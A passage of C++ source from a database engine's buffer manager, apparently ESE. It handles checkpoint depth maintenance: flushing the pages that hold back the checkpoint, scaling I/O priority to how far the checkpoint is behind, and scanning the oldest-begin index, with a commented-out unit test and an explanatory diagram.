BFIMaintCheckpointDepthIFlushPages( &dtickNextSchedule );
// remember the time when we last maintained the checkpoint depth
// if we have not completed our maintenance of the checkpoint depth then
// try to schedule another attempt in the near future
if ( dtickNextSchedule != dtickBFMaintNever )
{
Assert( dtickNextSchedule <= 60000 ); // should be less than 1 minute
#ifdef BF_REALTIME_CHECKPOINT_RESCHEDULING
const TICK dtickNextScheduleActual = dtickNextSchedule;
#else
const TICK dtickNextScheduleActual = dtickMaintCheckpointDepthRetry;
#endif
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "Scheduling BFIMaintCheckpointDepthITask for %u ticks in future (next estimated is in %u ticks).", dtickNextScheduleActual, dtickNextSchedule ) );
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCheckpointDepthITask,
NULL,
dtickNextScheduleActual,
0 ) >= JET_errSuccess )
{
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointDepthRequest.CAvail() == 0 );
g_semMaintCheckpointDepthRequest.Release();
}
}
// tries to flush all pages that are impeding the checkpoint
void BFIMaintCheckpointDepthIFlushPages( TICK * pdtickNextSchedule )
{
ERR err = JET_errSuccess;
CBFIssueList bfil;
const IFMP ifmpMin = FMP::IfmpMinInUse();
const IFMP ifmpMac = FMP::IfmpMacInUse();
IFMP ifmpStart = g_ifmpMaintCheckpointDepthStart;
IFMP ifmp;
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "Beginning Checkpoint Depth Maint at ifmpStart=0x%x (ifmpMin=0x%x, g_ifmpMax=0x%x)",
(ULONG)ifmpStart, (ULONG)ifmpMin, (ULONG)ifmpMac ) );
Assert( pdtickNextSchedule );
*pdtickNextSchedule = dtickBFMaintNever;
if ( ifmpMin > ifmpMac )
{
// if there are no active databases then we must be done
//
*pdtickNextSchedule = dtickBFMaintNever;
return;
}
// NOTE: we took a snapshot of ifmpMin/MacInUse because it could be
// being updated even as we're checking. However, it shouldn't
// really matter to take a snapshot because the start/stop ifmps are
// just optimisations to prevent us from scanning the entire FMP
// array, so in the worst case, we'll either just scan extra FMPs
// only to find that there's nothing to be done or we'll end up
// skipping some FMPs, but we'll just get those the next time
// around
// ensure starting FMP is in range
//
if ( ifmpStart < ifmpMin || ifmpStart > ifmpMac )
{
ifmpStart = ifmpMin;
}
// Set the TLS flag to indicate IOs are for checkpoint
Assert( !Ptls()->fCheckpoint );
Ptls()->fCheckpoint = fTrue;
// scan all active databases
//
ifmp = ifmpStart;
do
{
Assert( ifmp >= ifmpMin );
Assert( ifmp <= ifmpMac );
// if this database doesn't have a BF FMP context then try to give it
// one so that we have a chance to attempt checkpoint advancement. we
// need to do this even if no pages are cached to give the flush map a
// chance to be advanced
FMP * pfmp = &g_rgfmp[ifmp];
if ( !pfmp->FBFContext() )
{
FMP::EnterFMPPoolAsWriter();
pfmp->RwlDetaching().EnterAsReader();
if ( pfmp->FAttached() && !pfmp->FDetachingDB() && !pfmp->FBFContext() )
{
(VOID)ErrBFISetupBFFMPContext( ifmp );
}
pfmp->RwlDetaching().LeaveAsReader();
FMP::LeaveFMPPoolAsWriter();
}
// maintain the checkpoint depth for this IFMP
//
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
err = JET_errSuccess;
BOOL fUpdateCheckpoint = fFalse;
size_t ipinstCheckpointUpdate = INT_MAX;
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
const TICK tickNow = TickOSTimeCurrent();
const TICK tickNextMaint = pbffmp->tickMaintCheckpointDepthNext;
const LONG dtickNextMaint = DtickDelta( tickNow, tickNextMaint );
if ( dtickNextMaint <= 0 )
{
// It's come time to do checkpoint depth maint for this FMP ...
if ( g_rgfmp[ ifmp ].DwBFContext() )
{
err = ErrBFIMaintCheckpointDepthIFlushPagesByIFMP( ifmp, &fUpdateCheckpoint );
if ( err != JET_errSuccess )
{
// In theory we could instead of rescheduling rely on the IO completions to trigger
// more checkpoint depth maint, but I'm nervous about that. Also today it is at least
// a little unsafe as we only FTryAcquire to schedule this. It migth be an OK job
// though to increase the dtickMaintCheckpointDepthRetry from 10 to say 50?
*pdtickNextSchedule = dtickMaintCheckpointDepthRetry;
// but we allow immediate resched as soon as IOs complete ...
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent() + dtickMaintCheckpointDepthRetry;
}
else
{
// We finished for now, schedule soon
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent() + dtickMaintCheckpointDepthDelay;
}
}
pbffmp->tickMaintCheckpointDepthLast = TickOSTimeCurrent();
}
else
{
// This FMP isn't ready for checkpoint maintenence.
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "CP: Skipping due to time not yet elapsed (%u >= %u).",
tickNextMaint, tickNow ) );
#ifdef BF_REALTIME_CHECKPOINT_RESCHEDULING
// If the final next scheduled delta is greater than the current FMP's next schedule, we
// must reduce our final next scheduled delta to this value, so we don't accidentally quiesce
// checkpoint maintenance without maintaining this FMP.
if ( ( *pdtickNextSchedule == dtickBFMaintNever ) || ( dtickNextMaint < (LONG)( *pdtickNextSchedule ) ) )
{
const TICK dtickNextScheduleOld = *pdtickNextSchedule;
*pdtickNextSchedule = (TICK)dtickNextMaint;
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "CP: Changing dtickNextSchedule schedule from %u to %u.",
dtickNextScheduleOld, *pdtickNextSchedule ) );
}
#endif
}
// capture the inst we need to update the checkpoint for
ipinstCheckpointUpdate = IpinstFromPinst( PinstFromIfmp( ifmp ) );
Assert( PinstFromIfmp( ifmp ) == g_rgpinst[ipinstCheckpointUpdate] ); // just to make sure
}
pfmp->LeaveBFContextAsReader();
Assert( !fUpdateCheckpoint || ipinstCheckpointUpdate != INT_MAX );
if ( fUpdateCheckpoint )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, "CPUPD: Triggering checkpoint update from checkpoint maintenance." );
BFIMaintCheckpointIUpdateInst( ipinstCheckpointUpdate );
}
if ( err == errDiskTilt )
{
// Setting this allows the BFIMaintCheckpointDepthRequest() to ignore
// the next schedule time and just immediately ask for more checkpoint
// depth maint.
errLastCheckpointMaint = err;
break;
}
// advance to next ifmp for the next iteration of the loop,
// properly handling wraparound
//
ifmp++;
if ( ifmp > ifmpMac )
{
ifmp = ifmpMin;
}
}
while ( ifmp != ifmpStart );
// to make an intelligent decision and modify the pbffmp CP scheduling data
// we must own the request semaphore.
// Assert( g_semMaintCheckpointDepthRequest.FOwner() );
if ( err == errDiskTilt )
{
// if there are excessive I/O's pending, since we queue dirty pages in
// ascending IFMP order, we may not have been able to flush dirty pages
// for higher-numbered IFMP's (and which subsequently ends up holding back
// checkpoint advancement), so to ensure the checkpoint doesn't get bogged
// down by a lot of activity on one database, start on the next IFMP the
// next time around
//
g_ifmpMaintCheckpointDepthStart = ifmp + 1;
}
else
{
// we didn't find a lot of pages to queue for I/O, so next time around,
// it's safe to start at the first IFMP without worrying that dirty pages
// belonging to higher-numbered IFMP's got skipped
//
g_ifmpMaintCheckpointDepthStart = 0;
}
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "Next Checkpoint Depth Maint will begin at g_ifmpMaintCheckpointDepthStart=0x%x in %u ms",
(ULONG)g_ifmpMaintCheckpointDepthStart,
*pdtickNextSchedule ) );
// issue any queued writes and log flushes
(void)bfil.ErrIssue();
// Reset the TLS flag to indicate IOs are NOT for checkpoint
Ptls()->fCheckpoint = fFalse;
Assert( *pdtickNextSchedule == dtickBFMaintNever || *pdtickNextSchedule < INT_MAX ); // something went wrong w/ my math ...
}
// This function distills the latency of the current checkpoint against the target checkpoint
// into a IO QOS / priority of background or urgent background level between 1 and 127.
// Global used to size the buckets for knowing when to raise the checkpoint IO priority
//
// Note: This choice of 512 KB, makes it so we reach our maximum aggressiveness within 63.5 MBs
// of extra checkpoint depth... I find this reasonable.
const static ULONG g_cbCheckpointInterval = 512 * 1024;
// We could probably reduce g_cbCheckpointInterval, but I picked a value that is high enough
// that we wouldn't grow a level more aggressive while within a OB0 bucket uncertainty, even
// on a disk with 4KB sector sizes. This means all levels of aggressiveness are represented
// by a discretionable level of checkpoint behindness...
C_ASSERT( g_cbCheckpointInterval >= cbCheckpointTooDeepUncertainty );
INT IUrgentBFIMaintCheckpointPriority(
__in const LOG * const plog,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
__in const LGPOS lgposOldestBegin0 ) // no-ref, force copying as this happens w/o latch
{
INT iUrgentLevel;
Assert( 0 != CmpLgpos( lgposMin, lgposNewest ) );
Assert( 0 != CmpLgpos( lgposMin, lgposOldestBegin0 ) );
// Get the current behind-ness of this buffer
const QWORD cbCurrentCheckpoint = plog->CbLGOffsetLgposForOB0( lgposNewest, lgposOldestBegin0 );
// At 1.25x the checkpoint we start pushing more urgently / harder
// Cap urgent limit at log file size if checkpointDepth is 0
const QWORD cbUrgentCheckpoint = cbCheckpointDepth > 0 ?
cbCheckpointDepth + cbCheckpointDepth / 4 :
plog->CbLGSec() * plog->CSecLGFile();
Assert( cbCheckpointDepth <= cbUrgentCheckpoint );
// Calculate the priority of this BF IO ...
if ( cbCurrentCheckpoint < cbUrgentCheckpoint )
{
// We are keeping reasonably on top, regular background flush ...
iUrgentLevel = 0; // meaning qosIODispatchBackground
}
else
{
// We have fallen behind on checkpoint advancement, push more pressingly ...
// calculate a level of aggressiveness ...
const QWORD cbCheckpointOverdue = cbCurrentCheckpoint - cbUrgentCheckpoint;
iUrgentLevel = (INT)( cbCheckpointOverdue / g_cbCheckpointInterval + 1 );
iUrgentLevel = UlBound( iUrgentLevel, qosIODispatchUrgentBackgroundLevelMin, qosIODispatchUrgentBackgroundLevelMax );
}
return iUrgentLevel;
}
OSFILEQOS QosBFIMaintCheckpointPriority(
__in const INST * const pinst,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
__in const LGPOS lgposOldestBegin0 ) // no-ref, force copying as this happens w/o latch
{
OSFILEQOS qosIO;
Assert( 0 != CmpLgpos( lgposMin, lgposNewest ) );
Assert( 0 != CmpLgpos( lgposMin, lgposOldestBegin0 ) );
const INT iUrgentLevel = IUrgentBFIMaintCheckpointPriority( pinst->m_plog, lgposNewest, cbCheckpointDepth, lgposOldestBegin0 );
if ( 0 == iUrgentLevel )
{
// It is not urgent, meaning background ...
qosIO = qosIODispatchBackground;
}
else
{
// Urgent, convert the relative urgency into a QOS for the OS File APIs ...
qosIO = QosOSFileFromUrgentLevel( iUrgentLevel );
}
if ( JET_IOPriorityLowForCheckpoint & UlParam( pinst, JET_paramIOPriority ) )
{
qosIO |= qosIOOSLowPriority;
}
return qosIO;
}
OSFILEQOS QosBFIMaintCheckpointQuiescePriority()
{
OSFILEQOS qosIO;
const ULONG_PTR cioMax = UlParam( JET_paramOutstandingIOMax );
if ( cioMax > 256 )
{
// Note: We can choose such aggressive outstanding IO levels because below
// we are also adding the OS-level low priority flag, so in theory all such
// IO should not be able to drown out the disk with IO.
qosIO = QosOSFileFromUrgentLevel( 25 ); // 11 - 23 (@1024) IOs outstanding
}
else if ( cioMax <= 32 )
{
qosIO = QosOSFileFromUrgentLevel( 64 ); // 4 - 9 IOs outstanding
}
else if ( cioMax <= 64 )
{
qosIO = QosOSFileFromUrgentLevel( 50 ); // ? - 10 IOs outstanding
}
else if ( cioMax <= 128 )
{
qosIO = QosOSFileFromUrgentLevel( 38 ); // ? - 10 IOs outstanding
}
else if ( cioMax <= 256 )
{
qosIO = QosOSFileFromUrgentLevel( 33 ); // ? - 11 IOs outstandings
}
else
{
AssertSz( fFalse, "Somehow we didn't cover this cioMax = %d ??", cioMax );
}
// now add the OS low priority IO
qosIO = ( qosIO | qosIOOSLowPriority );
return qosIO;
}
/* AKR_TODO - how to make this test work
JETUNITTEST( BF, CheckpointToQOSLevelMath )
{
CHECK( 1 == 1 ); // testing, check, check, testing, 1, 2, 3
// Cruft up a new LOG so we can use member variables off it ... yes, we're doing an horrible, horrible thing here ...
BYTE * pb = new BYTE[ sizeof(LOG) ];
memset( pb, 0, sizeof(LOG) );
BYTE *pb2 = new BYTE[ sizeof(LOG_STREAM) ];
LOG_STREAM * volatile plogstream = (LOG_STREAM *)pb2;
plog->m_pLogStream = plogstream;
// Used by LOG::CbLGOffsetLgposForOB0()
#ifdef DEBUG
plog->m_fSectorSizeDuringInitOK = fTrue;
#endif // DEBUG
plog->m_pLogStream->m_cbSec_ = 512;
plog->m_pLogStream->m_cbSecVolume = 512;
plog->m_pLogStream->UpdateCSecLGFile();
LGPOS lgposNewest;
LGPOS lgposOB0;
lgposOB0.ib = 20;
lgposOB0.isec = 70;
lgposOB0.lGeneration = 21;
lgposNewest.ib = 25; // slightly ahead ...
lgposNewest.isec = 70;
lgposNewest.lGeneration = 41;
// testing just over the checkpoint ...
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// testing the free zone 1.00001 - 1.25x checkpoint always gives regular background QOS ...
lgposNewest.lGeneration = 42;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration = 43;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration = 44;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration = 45;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// Just below the urgent zone / 1.25x checkpoint ...
lgposNewest.isec = 60;
lgposNewest.lGeneration = 46;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// just above again ...
lgposNewest.isec = 70;
CHECK( qosIODispatchBackground != QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
CHECK( qosIODispatchUrgentBackgroundMin == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// should be urgency 3
lgposNewest.lGeneration = 47;
CHECK( QosOSFileFromUrgentLevel( 3 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.isec += 1024; // adds 512 KB, which puts this in the next chunk of urgency ...
CHECK( QosOSFileFromUrgentLevel( 4 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// should still be going linearly up
lgposNewest.lGeneration += 10;
CHECK( QosOSFileFromUrgentLevel( 24 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// improve the OB0 a little, to make sure we tested 2 OB0 values, should drop us 2 urgency levels
lgposOB0.lGeneration += 1;
CHECK( QosOSFileFromUrgentLevel( 22 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// test near the end ...
lgposNewest.lGeneration += 52; // ( 127 - 22 ) / 2 ... to find near end
CHECK( QosOSFileFromUrgentLevel( 126 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// test the end ... raise 1/2 a log
lgposNewest.isec -= 1024; // isec raised above, set it back down
lgposNewest.lGeneration += 1; // and inc log
CHECK( QosOSFileFromUrgentLevel( 127 ) == qosIODispatchUrgentBackgroundMax );
CHECK( qosIODispatchUrgentBackgroundMax == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// test past the end is capped ...
lgposNewest.lGeneration += 1;
CHECK( qosIODispatchUrgentBackgroundMax == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration += 100;
CHECK( qosIODispatchUrgentBackgroundMax == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// Be a good citizen, even in test code
delete [] pb;
}
*/
ERR ErrBFIOB0MaintEntry(
IFMP ifmp,
BFFMPContext * pbffmp,
BF * pbf,
BFOB0::CLock * plockOnOB0,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
const BFOB0MaintOperations fOperations
)
{
ERR err = JET_errSuccess;
// If we're using the not using the OB0, we better own the ob0ol crit ...
Assert( plockOnOB0 || pbffmp->critbfob0ol.FOwner() );
pbffmp->ChkAdvData.cEntriesVisited++;
if ( fOperations & bfob0moCleaning )
{
// if we found a clean BF in the OB0 then delete it
//
// NOTE: we delete these BFs when walking the OB0 index for many
// reasons. first, we MUST defer these deletes until some point
// after a BF is written to disk because not doing so would cause
// a deadlock (see BFICleanPage for more information). second, it
// is better to have as few threads as possible concurrently using
// this index. third, we need to delete these entries so that we
// do not spend huge amounts of time scanning through clean BFs
// trying to find the dirty BFs we are trying to flush
if ( pbf->bfdf == bfdfClean &&
pbf->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( pbf->bfdf == bfdfClean ) // establish pre-latch condition still holds.
{
if ( plockOnOB0 )
{
// if we found a clean BF in the OB0 index then delete it
BFOB0::ERR errOB0;
errOB0 = pbffmp->bfob0.ErrDeleteEntry( plockOnOB0 );
Assert( errOB0 == BFOB0::ERR::errSuccess );
pbf->lgposOldestBegin0 = lgposMax;
}
else
{
// if we found a clean BF in the OB0 overflow list then delete it
pbf->fInOB0OL = fFalse;
pbffmp->bfob0ol.Remove( pbf );
pbf->lgposOldestBegin0 = lgposMax;
}
pbffmp->ChkAdvData.cCleanRemoved++;
pbf->sxwl.ReleaseExclusiveLatch();
goto HandleError;
}
pbf->sxwl.ReleaseExclusiveLatch();
}
}
if ( fOperations & bfob0moFlushing )
{
// bfob0moFlushing requires bfob0moCleaning to run correctly ...
Assert( fOperations & bfob0moCleaning );
// Can't do flushing w/o effectively also versioning (b/c of ErrBFIPrepareFlush()), though
// technically we could turn of Ptls()->fCheckpoint here before calling ErrBFIFlushPage()
// and avoid this behavior, until someone needs it why bother.
Assert( fOperations & bfob0moVersioning );
// if we found a dirty BF in the OB0 index then flush it
if ( CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) ) // note we're making an unlatched read of bf state here, but tis ok.
{
// Caclulate the priority of this BF IO ...
const OSFILEQOS qosIO = ( fOperations & bfob0moQuiescing ) ?
QosBFIMaintCheckpointQuiescePriority() :
QosBFIMaintCheckpointPriority( PinstFromIfmp( ifmp ), lgposNewest, cbCheckpointDepth, pbf->lgposOldestBegin0 );
if ( qosIO != qosIODispatchBackground )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Checkpoint advancement falling behind, escalating BF page=[0x%x:0x%x] flush to 0x%I64x", (ULONG)pbf->ifmp, pbf->pgno, qosIO ) );
}
// Try to flush the page to disk
err = ErrBFIFlushPage( pbf, IOR( iorpBFCheckpointAdv ), qosIO );
switch( err )
{
case errBFIPageFlushed:
pbffmp->ChkAdvData.cFlushErrPageFlushed++;
break;
case errBFIPageFlushPending:
case errBFIPageFlushPendingSlowIO:
case errBFIPageFlushPendingHungIO:
pbffmp->ChkAdvData.cFlushErrPageFlushPending++;
break;
case errBFIRemainingDependencies:
pbffmp->ChkAdvData.cFlushErrRemainingDependencies++;
break;
case errBFIDependentPurged:
pbffmp->ChkAdvData.cFlushErrDependentPurged++;
break;
case errBFLatchConflict:
// In the case of a latch conflict it is a perfect time to try to
// mark this BF for versioning, because we don't need the latch
// to do that, and as it gets unlatched it very well could get
// immediately versioned for us.
BFIFlagDependenciesImpeding( pbf );
pbffmp->ChkAdvData.cFlushErrLatchConflict++;
break;
case errBFIPageTouchTooRecent:
// returned due to the waypoint protecting this page (or dependant page)
pbffmp->ChkAdvData.cFlushErrPageTouchTooRecent++;
break;
case errBFIPageFlushDisallowedOnIOThread:
AssertSz( fFalse, "Shouldn't see errBFIPageFlushDisallowedOnIOThread in " __FUNCTION__ );
break;
case JET_errSuccess:
pbffmp->ChkAdvData.cFlushErrSuccess++;
break;
default:
// This can happen other errors, like log full and errDiskTilt ...
pbffmp->ChkAdvData.cFlushErrOther++;
break;
}
Call( err );
}
}
else if ( ( fOperations & bfob0moVersioning ) && !( fOperations & bfob0moFlushing ) )
{
// We only want to version, this is only done for the overscan range
if ( CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) )
{
BFIFlagDependenciesImpeding( pbf );
}
}
HandleError:
return err;
}
ERR ErrBFIOB0MaintScan(
const IFMP ifmp,
BFFMPContext * const pbffmp,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
BFOB0::CLock * const plockOB0, // we pass the plock only so we can keep the stats across calls run.
LGPOS lgposStartBM,
__inout LGPOS * const plgposStopBM,
__out LGPOS * const plgposForwardFlushProgressBM,
enum BFOB0MaintOperations fOperations
)
{
ERR err = JET_errSuccess;
BOOL fTracedInitBM = fFalse;
BOOL fHadFlushErr = fFalse;
BOOL fSetUrgentCtr = 0 != CmpLgpos( lgposMin, lgposStartBM ); // inhibits setting unless we start from lgposMin
//
// Validate in parameters ...
//
Assert( fOperations ); // at least one op should be specified.
Assert( plgposStopBM );
Assert( lgposStartBM.lGeneration >= 0 );
Assert( plgposStopBM->lGeneration >= 0 );
Assert( CmpLgpos( *plgposStopBM, lgposMax ) != 0 ); // don't use a BM that is not ridiculously far out.
if ( plgposForwardFlushProgressBM )
{
*plgposForwardFlushProgressBM = lgposMin;
}
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s ( ifmp=0x%x, lgposStartBM=%08x:%04x:%04x, *plgposStopBM=%08x:%04x:%04x, %s%s%s )",
__FUNCTION__,
(ULONG)ifmp,
lgposStartBM.lGeneration, lgposStartBM.isec, lgposStartBM.ib,
plgposStopBM->lGeneration, plgposStopBM->isec, plgposStopBM->ib,
fOperations & bfob0moCleaning ? "Clean" : "",
fOperations & bfob0moFlushing ? "Flush" : "",
fOperations & bfob0moVersioning ? "Versn" : ""
) );
//
// We start by rounding up to where we will really be stopping (due to OB0 uncertainty) ...
//
*plgposStopBM = BFIOB0Lgpos( ifmp, *plgposStopBM, fTrue );
if ( CmpLgpos( lgposStartBM, *plgposStopBM ) >= 0 )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s start/end BMs same, nothing to do. [ifmp=0x%x]", __FUNCTION__, (ULONG)ifmp ) );
if ( plgposForwardFlushProgressBM )
{
*plgposForwardFlushProgressBM = *plgposStopBM;
}
return( JET_errSuccess );
}
if ( 0 == CmpLgpos( lgposStartBM, lgposMin ) )
{
// Don't actually start at lgposMin, that'd be hideously expensive,
// just move to beginning.
pbffmp->bfob0.MoveBeforeFirst( plockOB0 );
}
else
{
pbffmp->bfob0.MoveBeforeKeyPtr( BFIOB0Offset( ifmp, &lgposStartBM ), NULL, plockOB0 );
}
while ( pbffmp->bfob0.ErrMoveNext( plockOB0 ) != BFOB0::ERR::errNoCurrentEntry )
{
PBF pbf;
BFOB0::ERR errOB0;
errOB0 = pbffmp->bfob0.ErrRetrieveEntry( plockOB0, &pbf );
Assert( errOB0 == BFOB0::ERR::errSuccess );
LGPOS lgposOldestBegin0 = BFIOB0Lgpos( ifmp, pbf->lgposOldestBegin0 ); // factor in the OB0 uncertainty
if ( !fTracedInitBM )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s actual starting lgposStartBM=%08x:%04x:%04x [ifmp=0x%x]",
__FUNCTION__,
lgposOldestBegin0.lGeneration,
lgposOldestBegin0.isec,
lgposOldestBegin0.ib,
(ULONG)ifmp ) );
fTracedInitBM = fTrue;
}
if ( !fSetUrgentCtr )
{
if ( fOperations & bfob0moFlushing )
{
const INT iUrgentLevelWorst = IUrgentBFIMaintCheckpointPriority( PinstFromIfmp( pbf->ifmp )->m_plog, lgposNewest, cbCheckpointDepth, lgposOldestBegin0 );
if ( iUrgentLevelWorst )
{
PERFOptDeclare( const INT cioOutstandingMax = CioOSDiskPerfCounterIOMaxFromUrgentQOS( QosOSFileFromUrgentLevel( iUrgentLevelWorst ) ) );
PERFOpt( cBFCheckpointMaintOutstandingIOMax.Set( PinstFromIfmp( pbf->ifmp ), cioOutstandingMax ) );
}
else
{
PERFOpt( cBFCheckpointMaintOutstandingIOMax.Set( PinstFromIfmp( pbf->ifmp ), 1 ) );
}
}
fSetUrgentCtr = fTrue;
}
if ( CmpLgpos( &lgposOldestBegin0, plgposStopBM ) >= 0 )
{
break;
}
// Maintain (flush, clean, etc) this entry
err = ErrBFIOB0MaintEntry( ifmp, pbffmp, pbf, plockOB0, lgposNewest, cbCheckpointDepth, fOperations );
// save progress / currency on the OB0 in case the caller is interested ...
if ( plgposForwardFlushProgressBM )
{
Expected( fOperations & bfob0moFlushing || fOperations & bfob0moCleaning /* for debug */ );
// Why we treat this as a non-flush error?
// we have found that when maintaining say a checkpoint of 20, and a
// waypoint of 7, we end up maintaining a checkpoint of 27. What we
// end up having is waypoint protected (errBFIPageTouchTooRecent) pages
// stuck in the 20 - 27 range. So we allow ourselves to track progress
// up to the first non-error / first non-waypoint protected BF.
if ( !fHadFlushErr )
{
*plgposForwardFlushProgressBM = lgposOldestBegin0;
if ( err != JET_errSuccess &&
err != errBFIPageTouchTooRecent )
{
// Some kind of flush based error... stop updating flush progress at this point ...
fHadFlushErr = fTrue;
}
}
}
// while eating Chicken Stuffed Tortillas (a wonderful dish, BTW) at the
// Cheese Cake Factory, we realized that we must check tiltyness after we
// save progress, otherwise if we get errDiskTilt on the first entry, we
// can be fooled into thinking we reached the plgposStopBM below because
// plgposForwardFlushProgressBM is lgposMin.
if ( err == errDiskTilt )
{
break;
}
}
pbffmp->bfob0.UnlockKeyPtr( plockOB0 );
pbffmp->critbfob0ol.Enter();
PBF pbfNext;
ULONG cIterations = 0;
for ( PBF pbf = pbffmp->bfob0ol.PrevMost(); pbf != pbfNil; pbf = pbfNext )
{
pbfNext = pbffmp->bfob0ol.Next( pbf );
// Note we do not use lgposStartBM here, meaning we scan everything from
// lgposMin to less than the lgposStopBM. I figure since there really
// shouldn't be many in the ob0ol it should be fine from a perf perspective,
// and since no caller has a hard requirement we don't scan anything before
// the lgposStartBM, this is fine.
if ( CmpLgpos( &pbf->lgposOldestBegin0, plgposStopBM ) < 0 )
{
// Maintain (flush, clean, etc) this entry
err = ErrBFIOB0MaintEntry( ifmp, pbffmp, pbf, NULL, lgposNewest, cbCheckpointDepth, fOperations );
if ( err == errDiskTilt )
{
break;
}
}
Assert( cIterations++ < 50 ); // this system won't scale we should know if this happens ...
}
pbffmp->critbfob0ol.Leave();
if ( plgposForwardFlushProgressBM &&
0 == CmpLgpos( plgposForwardFlushProgressBM, &lgposMin ) )
{
// We visited no entries ....
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s Visited no entries. [ifmp=0x%x]", __FUNCTION__, (ULONG)ifmp ) );
*plgposForwardFlushProgressBM = *plgposStopBM;
}
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s actual stopping plgposStopBM=%08x:%04x:%04x [ifmp=0x%x]",
__FUNCTION__,
plgposStopBM->lGeneration,
plgposStopBM->isec,
plgposStopBM->ib,
(ULONG)ifmp ) );
return err;
}
//
// (diagram assumes fixed width ... alt-F12 in SI)
//
//
// This is the template diagram for checkpoint, waypoint, toflush, and logrec ...
//
// ChkPoint
// Setting ToFlush
// | | LogRec
// | Waypoint | unflushed log buffers
// | | | |
// | | | | future log writes ->
// -------------------------|-----------------------------------|-------------|ooooo| - - - - - - - - - - - -
// | |
// | |
//
// Some notes:
// ChkPoint, aka PreferredCheckpoint is lgposLogRec - the max checkpoint depth param.
// Waypoint, is ToFlush - waypoint latency setting
//
//
// Case 1: No adv needed
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// OB0 BT0
//
// Probably only during init, or after a lot of idle flushing. Whether OB0
// is before or after BT0 is considered the same case for our purposes in
// checkpoint advancement.
//
//
// Case 2: Inc adv needed, no long running trx
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// OB0 BT0
//
// Very common case, BT0 is w/in check point, and some incremental amount of
// BFs past the checkpoint need flushing.
//
//
// Case 3: Inc adv needed, no long running trx (the waypoint affect)
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// |xxxxxx x x |
// OB0 BT0
//
// x = Unflushable.
//
// A unfortunately common case, BT0 is w/in check point, and some incremental
// amount of BFs past the checkpoint need flushing, but many of the BFs are
// unflushable due to the waypoint (actually a combination of dependencies and
// the waypoint). We can spin quite a bit of time processing these over and
// over again w/o actually making very much "IO progress" if checkpoint advancement
// and staying in an agressive mode, despite the log not having moved 1 log
// up to a state where the waypoint has freed up pages to be flushable.
//
//
// Case 4a: Inc Adv, long running RO trx
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// BT0 OB0
//
// Occasional case, but must be handled well. OB0 has a incremental flushing
// to do but long running transaction is ultimately holding the checkpoint back.
// This can't last too long as the version store will run out eventually.
// Case 4b: Inc Adv, long running RW trx
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// BT0 OB0
//
// Occasional case, but must be handled well. OB0 has a moderate flushing to
// do, and the long running transaction ultimately holding the checkpoint back,
// is also randomly adding pages to the OB0 making it jump back randomly. This
// can't last too long as the version store will run out eventually. Note
